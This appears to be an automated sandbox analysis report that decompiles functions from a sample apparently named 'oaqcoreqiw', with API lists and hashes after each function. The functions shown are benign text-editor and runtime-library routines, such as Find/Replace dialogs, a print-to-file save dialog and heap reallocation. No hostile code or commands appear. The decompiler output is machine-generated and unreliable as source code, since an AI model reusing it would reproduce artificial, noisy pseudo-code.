                                                  										__eflags = _t66;
                                                  										if(_t66 == 0) {
                                                  											goto L14;
                                                  										}
                                                  									} else {
                                                  										_t68 = E010A4BEE();
                                                  										__eflags = _t97 - _t68 + 0x40;
                                                  										if(_t97 != _t68 + 0x40) {
                                                  											L14:
                                                  											E010AE1D7(_t97);
                                                  										} else {
                                                  											goto L13;
                                                  										}
                                                  									}
                                                  								}
                                                  								__eflags = _t97[3] & 0x00000108;
                                                  								if(__eflags == 0) {
                                                  									_v12 = _a4;
                                                  									_push(2);
                                                  									_push( &_v12);
                                                  									_push(_t94);
                                                  									_v8 = 2;
                                                  									_t53 = E010A9CE9(_t75, _t91, _t94, _t97, __eflags);
                                                  									_t80 = _a4;
                                                  									_t75 = _t53;
                                                  									goto L27;
                                                  								} else {
                                                  									_t92 = _t97[2];
                                                  									 *_t97 = _t92 + 2;
                                                  									_t82 =  *_t97 - _t92;
                                                  									_v8 = _t82;
                                                  									_t97[1] = _t97[6] - 2;
                                                  									__eflags = _t82;
                                                  									if(__eflags <= 0) {
                                                  										__eflags = _t94 - 0xffffffff;
                                                  										if(_t94 == 0xffffffff) {
                                                  											L22:
                                                  											_t83 = 0x10c1560;
                                                  										} else {
                                                  											__eflags = _t94 - 0xfffffffe;
                                                  											if(_t94 == 0xfffffffe) {
                                                  												goto L22;
                                                  											} else {
                                                  												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t94 >> 5) * 4));
                                                  											}
                                                  										}
                                                  										__eflags =  *(_t83 + 4) & 0x00000020;
                                                  										if(__eflags == 0) {
                                                  											goto L25;
                                                  										} else {
                                                  											_push(2);
                                                  											_push(_t75);
                                                  											_push(_t75);
                                                  											_push(_t94);
                                                  											_t59 = E010A7180(_t75, _t94, _t97, __eflags);
                                                  											__eflags = (_t59 & _t92) - 0xffffffff;
                                                  											if((_t59 & _t92) == 0xffffffff) {
                                                  												goto L28;
                                                  											} else {
                                                  												goto L25;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_push(_t82);
                                                  										_push(_t92);
                                                  										_push(_t94);
                                                  										_t75 = E010A9CE9(_t75, _t92, _t94, _t97, __eflags);
                                                  										L25:
                                                  										_t80 = _a4;
                                                  										 *(_t97[2]) = _t80;
                                                  										L27:
                                                  										__eflags = _t75 - _v8;
                                                  										if(_t75 == _v8) {
                                                  											_t54 = _t80 & 0x0000ffff;
                                                  										} else {
                                                  											L28:
                                                  											_t43 =  &(_t97[3]);
                                                  											 *_t43 = _t97[3] | 0x00000020;
                                                  											__eflags =  *_t43;
                                                  											goto L29;
                                                  										}
                                                  									}
                                                  								}
                                                  							} else {
                                                  								_t97[1] = 0;
                                                  								__eflags = _t79 & 0x00000010;
                                                  								if((_t79 & 0x00000010) == 0) {
                                                  									_t97[3] = _t79 | 0x00000020;
                                                  									L29:
                                                  									_t54 = 0xffff;
                                                  								} else {
                                                  									_t90 = _t79 & 0xfffffffe;
                                                  									__eflags = _t90;
                                                  									 *_t97 = _t97[2];
                                                  									_t97[3] = _t90;
                                                  									goto L10;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							 *((intOrPtr*)(E010A6117())) = 0x22;
                                                  							goto L6;
                                                  						}
                                                  					} else {
                                                  						 *((intOrPtr*)(E010A6117())) = 9;
                                                  						L6:
                                                  						_t97[3] = _t97[3] | 0x00000020;
                                                  						_t54 = 0xffff;
                                                  					}
                                                  					return _t54;
                                                  				} else {
                                                  					return _t46 | 0xffffffff;
                                                  				}
                                                  			}






























                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B52E6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction ID: 833a5784a6de25f7adcfdf35e181e58674b31c7d8a2c3740963af601c17df2d7
                                                  • Opcode Fuzzy Hash: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction Fuzzy Hash: 1241D471601B069BD7249B6CCCC1AEE7BE4AF41324F08C6ADE5E6877D1E7B4E8408B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E010AB4EA(void* __eflags, signed char _a4, intOrPtr* _a8) {
                                                  				signed int _v8;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t43;
                                                  				signed int _t44;
                                                  				signed int _t45;
                                                  				signed int _t48;
                                                  				signed int _t52;
                                                  				void* _t60;
                                                  				signed int _t62;
                                                  				void* _t64;
                                                  				signed int _t67;
                                                  				signed int _t70;
                                                  				signed int _t74;
                                                  				signed int _t76;
                                                  				void* _t77;
                                                  				signed int _t85;
                                                  				void* _t86;
                                                  				signed int _t87;
                                                  				signed int _t89;
                                                  				intOrPtr* _t92;
                                                  
                                                  				_t44 = E010A732B(_t43);
                                                  				if(_t44 >= 0) {
                                                  					_t92 = _a8;
                                                  					_t45 = E010A66B0(_t92);
                                                  					_t2 = _t92 + 0xc; // 0x66ce7cf0
                                                  					_t74 =  *_t2;
                                                  					_t89 = _t45;
                                                  					__eflags = _t74 & 0x00000082;
                                                  					if((_t74 & 0x00000082) != 0) {
                                                  						__eflags = _t74 & 0x00000040;
                                                  						if((_t74 & 0x00000040) == 0) {
                                                  							_t70 = 0;
                                                  							__eflags = _t74 & 0x00000001;
                                                  							if((_t74 & 0x00000001) == 0) {
                                                  								L10:
                                                  								_t16 = _t92 + 0xc; // 0x66ce7cf0
                                                  								_t48 =  *_t16 & 0xffffffef | 0x00000002;
                                                  								 *(_t92 + 0xc) = _t48;
                                                  								 *(_t92 + 4) = _t70;
                                                  								__eflags = _t48 & 0x0000010c;
                                                  								if((_t48 & 0x0000010c) == 0) {
                                                  									_t60 = E010A4BEE();
                                                  									__eflags = _t92 - _t60 + 0x20;
                                                  									if(_t92 == _t60 + 0x20) {
                                                  										L13:
                                                  										_t62 = E010AE41E(_t89);
                                                  										__eflags = _t62;
                                                  										if(_t62 == 0) {
                                                  											goto L14;
                                                  										}
                                                  									} else {
                                                  										_t64 = E010A4BEE();
                                                  										__eflags = _t92 - _t64 + 0x40;
                                                  										if(_t92 != _t64 + 0x40) {
                                                  											L14:
                                                  											E010AE1D7(_t92);
                                                  										} else {
                                                  											goto L13;
                                                  										}
                                                  									}
                                                  								}
                                                  								__eflags =  *(_t92 + 0xc) & 0x00000108;
                                                  								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
                                                  									__eflags = 1;
                                                  									_push(1);
                                                  									_v8 = 1;
                                                  									_push( &_a4);
                                                  									_push(_t89);
                                                  									_t45 = E010A9CE9(_t70, _t86, _t89, _t92, 1);
                                                  									_t70 = _t45;
                                                  									goto L27;
                                                  								} else {
                                                  									_t24 = _t92 + 8; // 0x753b46c6
                                                  									_t87 =  *_t24;
                                                  									_t25 = _t87 + 1; // 0x753b46c7
                                                  									 *_t92 = _t25;
                                                  									_t26 = _t92 + 0x18; // 0x8b0d78fe
                                                  									_t76 =  *_t92 - _t87;
                                                  									_v8 = _t76;
                                                  									 *(_t92 + 4) =  *_t26 - 1;
                                                  									__eflags = _t76;
                                                  									if(__eflags <= 0) {
                                                  										__eflags = _t89 - 0xffffffff;
                                                  										if(_t89 == 0xffffffff) {
                                                  											L22:
                                                  											_t77 = 0x10c1560;
                                                  										} else {
                                                  											__eflags = _t89 - 0xfffffffe;
                                                  											if(_t89 == 0xfffffffe) {
                                                  												goto L22;
                                                  											} else {
                                                  												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t89 >> 5) * 4));
                                                  											}
                                                  										}
                                                  										__eflags =  *(_t77 + 4) & 0x00000020;
                                                  										if(__eflags == 0) {
                                                  											goto L25;
                                                  										} else {
                                                  											_push(2);
                                                  											_push(_t70);
                                                  											_push(_t70);
                                                  											_push(_t89);
                                                  											_t45 = E010A7180(_t70, _t89, _t92, __eflags) & _t87;
                                                  											__eflags = _t45 - 0xffffffff;
                                                  											if(_t45 == 0xffffffff) {
                                                  												goto L28;
                                                  											} else {
                                                  												goto L25;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_push(_t76);
                                                  										_push(_t87);
                                                  										_push(_t89);
                                                  										_t70 = E010A9CE9(_t70, _t87, _t89, _t92, __eflags);
                                                  										L25:
                                                  										_t35 = _t92 + 8; // 0x753b46c6
                                                  										_t45 = _a4;
                                                  										 *( *_t35) = _t45;
                                                  										L27:
                                                  										__eflags = _t70 - _v8;
                                                  										if(_t70 == _v8) {
                                                  											_t52 = _a4 & 0x000000ff;
                                                  										} else {
                                                  											L28:
                                                  											_t40 = _t92 + 0xc;
                                                  											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
                                                  											__eflags =  *_t40;
                                                  											goto L29;
                                                  										}
                                                  									}
                                                  								}
                                                  							} else {
                                                  								 *(_t92 + 4) = 0;
                                                  								__eflags = _t74 & 0x00000010;
                                                  								if((_t74 & 0x00000010) == 0) {
                                                  									 *(_t92 + 0xc) = _t74 | 0x00000020;
                                                  									L29:
                                                  									_t52 = _t45 | 0xffffffff;
                                                  								} else {
                                                  									_t14 = _t92 + 8; // 0x753b46c6
                                                  									_t85 = _t74 & 0xfffffffe;
                                                  									__eflags = _t85;
                                                  									 *_t92 =  *_t14;
                                                  									 *(_t92 + 0xc) = _t85;
                                                  									goto L10;
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_t67 = E010A6117();
                                                  							 *_t67 = 0x22;
                                                  							goto L6;
                                                  						}
                                                  					} else {
                                                  						_t67 = E010A6117();
                                                  						 *_t67 = 9;
                                                  						L6:
                                                  						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
                                                  						_t52 = _t67 | 0xffffffff;
                                                  					}
                                                  					return _t52;
                                                  				} else {
                                                  					return _t44 | 0xffffffff;
                                                  				}
                                                  			}


























                                                  0x010ab543
                                                  0x010ab546
                                                  0x010ab549
                                                  0x010ab5cb
                                                  0x010ab638
                                                  0x010ab638
                                                  0x010ab54b
                                                  0x010ab54b
                                                  0x010ab54e
                                                  0x010ab54e
                                                  0x010ab551
                                                  0x010ab553
                                                  0x00000000
                                                  0x010ab553
                                                  0x010ab549
                                                  0x010ab524
                                                  0x010ab524
                                                  0x010ab529
                                                  0x00000000
                                                  0x010ab529
                                                  0x010ab512
                                                  0x010ab512
                                                  0x010ab517
                                                  0x010ab52f
                                                  0x010ab52f
                                                  0x010ab533
                                                  0x010ab533
                                                  0x010ab645
                                                  0x010ab4f7
                                                  0x010ab4fb
                                                  0x010ab4fb

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010AB4EE
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction ID: a1bd2350afacca97252c58100902b6f9b40510d43ea01d561ca521fc01868a7b
                                                  • Opcode Fuzzy Hash: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction Fuzzy Hash: 3D41F1B1500B069ED7249FFDC891BBA7BE49F49330B88875DD9E6C72D1E678E8008B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A15A0(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                  				void* _v524;
                                                  				void* _t10;
                                                  				int _t16;
                                                  				void* _t18;
                                                  				struct HWND__* _t19;
                                                  				unsigned int _t23;
                                                  				long _t25;
                                                  
                                                  				_t10 = _a8 - 0x4e;
                                                  				if(_t10 == 0) {
                                                  					if( *((intOrPtr*)(_a16 + 8)) == 0xfffffda6 &&  *0x10c4c8c != 0) {
                                                  						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
                                                  						_t16 = E010A14B0( &_v524);
                                                  						if(_t16 != 0xffffffff) {
                                                  							 *0x10c4c88 = _t16;
                                                  							SendMessageW( *0x10c2db0, 0x14e, _t16, 0);
                                                  						}
                                                  					}
                                                  					goto L11;
                                                  				} else {
                                                  					_t18 = _t10 - 0xc2;
                                                  					if(_t18 == 0) {
                                                  						_t19 = GetDlgItem(_a4, 0x191);
                                                  						 *0x10c2db0 = _t19;
                                                  						SendMessageW(_t19, 0x14e,  *0x10c4c88, 0);
                                                  						return 0;
                                                  					} else {
                                                  						if(_t18 != 1) {
                                                  							L11:
                                                  							return 0;
                                                  						} else {
                                                  							_t23 = _a12;
                                                  							if(_t23 != 0x191 || _t23 >> 0x10 != 1) {
                                                  								goto L11;
                                                  							} else {
                                                  								_t25 = SendMessageW( *0x10c2db0, 0x147, 0, 0);
                                                  								_t26 =  ==  ? 0 : _t25;
                                                  								 *0x10c4c88 =  ==  ? 0 : _t25;
                                                  								return 0;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}











                                                  APIs
                                                  • SendMessageW.USER32(00000147,00000000,00000000), ref: 010A15EF
                                                  • GetDlgItem.USER32 ref: 010A1612
                                                  • SendMessageW.USER32(00000000,0000014E,00000000), ref: 010A162B
                                                  • GetParent.USER32(FFFFFDA6), ref: 010A165F
                                                  • SendMessageW.USER32(00000000), ref: 010A1666
                                                  • SendMessageW.USER32(0000014E,00000000,00000000), ref: 010A168F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ItemParent
                                                  • String ID:
                                                  • API String ID: 2505470899-0
                                                  • Opcode ID: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction ID: 6df2e01c03821161c55812c6b3c2245439df1d4947eced577bd5f408d4baee9d
                                                  • Opcode Fuzzy Hash: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction Fuzzy Hash: 5A21C330200208AFEB709FB8DD89BA93BE4E708711F444652F9D8DA1E5EB7698508F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 44%
                                                  			E010A24AC(void* __ebx) {
                                                  				struct HWND__* _t1;
                                                  				void* _t5;
                                                  				void* _t9;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  
                                                  				_t9 = __ebx + 1;
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				_t1 =  *0x10c3f28;
                                                  				if(_t1 == 0) {
                                                  					asm("xorps xmm0, xmm0");
                                                  					asm("movq [0x10c50bc], xmm0");
                                                  					 *0x10c50c0 =  *0x10c3f24;
                                                  					asm("movq [0x10c50c4], xmm0");
                                                  					 *0x10c50c4 =  *0x10c3f20;
                                                  					asm("movq [0x10c50cc], xmm0");
                                                  					asm("movq [0x10c50d4], xmm0");
                                                  					asm("movq [0x10c50dc], xmm0");
                                                  					0x10c50bc->lStructSize = 0x28;
                                                  					 *0x10c50cc = 0x10c3fa0;
                                                  					 *0x10c50d4 = 0;
                                                  					 *0x10c50d0 = 0x10c41a8;
                                                  					 *0x10c50c8 = 0x10001;
                                                  					_t5 = ReplaceTextW(0x10c50bc);
                                                  					 *0x10c3f28 = _t5;
                                                  					__eflags = _t5;
                                                  					if(__eflags == 0) {
                                                  						_push(0x563);
                                                  						return E010A2DDC(_t9, _t10, _t11, _t12, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
                                                  					}
                                                  					return _t5;
                                                  				} else {
                                                  					return SetActiveWindow(_t1);
                                                  				}
                                                  			}










                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveReplaceTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 172568423-3286657855
                                                  • Opcode ID: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction ID: 2873199ecd9aab7e5cd1c5d3b4e0964ac411e1baf94780f30124e90bafac16c5
                                                  • Opcode Fuzzy Hash: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction Fuzzy Hash: 4A011E78B21302CED760CFA9EC8469937F0B7AA7007604619F5C4DB248E7BB70448F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 45%
                                                  			E010A23F5(struct HWND__* __eax) {
                                                  				void* _t5;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  
                                                  				if(__eax == 0) {
                                                  					asm("xorps xmm0, xmm0");
                                                  					asm("movq [0x10c50bc], xmm0");
                                                  					 *0x10c50c0 =  *0x10c3f24;
                                                  					asm("movq [0x10c50c4], xmm0");
                                                  					 *0x10c50c4 =  *0x10c3f20;
                                                  					asm("movq [0x10c50cc], xmm0");
                                                  					asm("movq [0x10c50d4], xmm0");
                                                  					asm("movq [0x10c50dc], xmm0");
                                                  					 *0x10c50bc = 0x28;
                                                  					 *0x10c50cc = 0x10c3fa0;
                                                  					 *0x10c50d4 = 0;
                                                  					 *0x10c50c8 = 0x10001;
                                                  					_t5 = FindTextW(0x10c50bc);
                                                  					 *0x10c3f28 = _t5;
                                                  					__eflags = _t5;
                                                  					if(__eflags == 0) {
                                                  						_push(0x541);
                                                  						return E010A2DDC(_t8, _t9, _t10, _t11, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
                                                  					}
                                                  					return _t5;
                                                  				} else {
                                                  					return SetActiveWindow(__eax);
                                                  				}
                                                  			}









                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveFindTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 1223664302-3286657855
                                                  • Opcode ID: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction ID: 1be37648399eb3f74a3eb7ffc5055167b63b6c9fe264c08a227821bb027acbb4
                                                  • Opcode Fuzzy Hash: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction Fuzzy Hash: A1011D79B21703CED720DFA5ED8419936B0B76A3007608619F5C4DA208E7BF70848F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E010A1540(intOrPtr __ecx) {
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v60;
                                                  				signed int _v64;
                                                  				intOrPtr _v88;
                                                  				struct tagOFNA _v92;
                                                  				signed int _t12;
                                                  				intOrPtr _t16;
                                                  
                                                  				_t16 = __ecx;
                                                  				E010A66E0( &_v92, 0, 0x58);
                                                  				_v92 = 0x58;
                                                  				_v40 = 0x806;
                                                  				_v88 = _t16;
                                                  				_v64 = L"output.prn";
                                                  				_v60 = 0x104;
                                                  				_v32 = L"prn";
                                                  				_t12 = GetSaveFileNameW( &_v92);
                                                  				asm("sbb eax, eax");
                                                  				return  ~_t12 & L"output.prn";
                                                  			}












                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memset
                                                  • String ID: X$output.prn$prn
                                                  • API String ID: 1534219092-3762636045
                                                  • Opcode ID: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction ID: e2599603cedc2607cc0b31915f7e08254877d9d8b234ea696e0a881e293b064c
                                                  • Opcode Fuzzy Hash: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction Fuzzy Hash: AFF08CB1C4024D9BCB00DFD4DC4A7CEBBB8AB08749F104009E944EA284EBB984588F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E010AF09F(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                  				void* _t7;
                                                  				void* _t8;
                                                  				intOrPtr* _t9;
                                                  				intOrPtr* _t12;
                                                  				void* _t20;
                                                  				long _t31;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t31 = _a8;
                                                  					if(_t31 != 0) {
                                                  						_push(__ebx);
                                                  						while(_t31 <= 0xffffffe0) {
                                                  							if(_t31 == 0) {
                                                  								_t31 = _t31 + 1;
                                                  							}
                                                  							_t7 = HeapReAlloc( *0x10c27c4, 0, _a4, _t31);
                                                  							_t20 = _t7;
                                                  							if(_t20 != 0) {
                                                  								L17:
                                                  								_t8 = _t20;
                                                  							} else {
                                                  								if( *0x10c2d90 == _t7) {
                                                  									_t9 = E010A6117();
                                                  									 *_t9 = E010A6170(GetLastError());
                                                  									goto L17;
                                                  								} else {
                                                  									if(E010A8EE3(_t7, _t31) == 0) {
                                                  										_t12 = E010A6117();
                                                  										 *_t12 = E010A6170(GetLastError());
                                                  										L12:
                                                  										_t8 = 0;
                                                  									} else {
                                                  										continue;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L14;
                                                  						}
                                                  						E010A8EE3(_t6, _t31);
                                                  						 *((intOrPtr*)(E010A6117())) = 0xc;
                                                  						goto L12;
                                                  					} else {
                                                  						E010A8C4B(_a4);
                                                  						_t8 = 0;
                                                  					}
                                                  					L14:
                                                  					return _t8;
                                                  				} else {
                                                  					return E010AF00D(__ebx, __edx, __edi, _a8);
                                                  				}
                                                  			}









                                                  APIs
                                                  • _malloc.LIBCMT ref: 010AF0AB
                                                    • Part of subcall function 010AF00D: __FF_MSGBANNER.LIBCMT ref: 010AF024
                                                    • Part of subcall function 010AF00D: __NMSG_WRITE.LIBCMT ref: 010AF02B
                                                    • Part of subcall function 010AF00D: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,00000000,00000000,?,010A8CE3,00000000,00000000,00000000,00000000,?,010A891D,00000018,010BF1D8), ref: 010AF050
                                                  • _free.LIBCMT ref: 010AF0BE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 1020059152-0
                                                  • Opcode ID: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction ID: 6acf8d7eeacd4ee94d2e70671bdddf4bf3011364256ec58441b7fbdb7462d314
                                                  • Opcode Fuzzy Hash: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction Fuzzy Hash: F011C672500217AFDB723BF4EC44ADE3BE89F12265F94466AFAC49B141DF3698408B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E010A14B0(WCHAR* __ecx) {
                                                  				long _v8;
                                                  				void _v264;
                                                  				int _t5;
                                                  				int _t12;
                                                  				long _t16;
                                                  				void* _t19;
                                                  
                                                  				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
                                                  				_t19 = _t5;
                                                  				if(_t19 == 0xffffffff) {
                                                  					L4:
                                                  					return _t5 | 0xffffffff;
                                                  				} else {
                                                  					_t16 = GetFileSize(_t19, 0);
                                                  					if(_t16 != 0xffffffff) {
                                                  						_t10 =  <  ? _t16 : 0xff;
                                                  						_t12 = ReadFile(_t19,  &_v264,  <  ? _t16 : 0xff,  &_v8, 0);
                                                  						_push(_t19);
                                                  						if(_t12 == 0) {
                                                  							goto L3;
                                                  						} else {
                                                  							CloseHandle();
                                                  							return E010A10E0( &_v264, _v8);
                                                  						}
                                                  					} else {
                                                  						_push(_t19);
                                                  						L3:
                                                  						_t5 = CloseHandle();
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}









                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14CD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14DD
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14EB
                                                  • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A1512
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A151D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
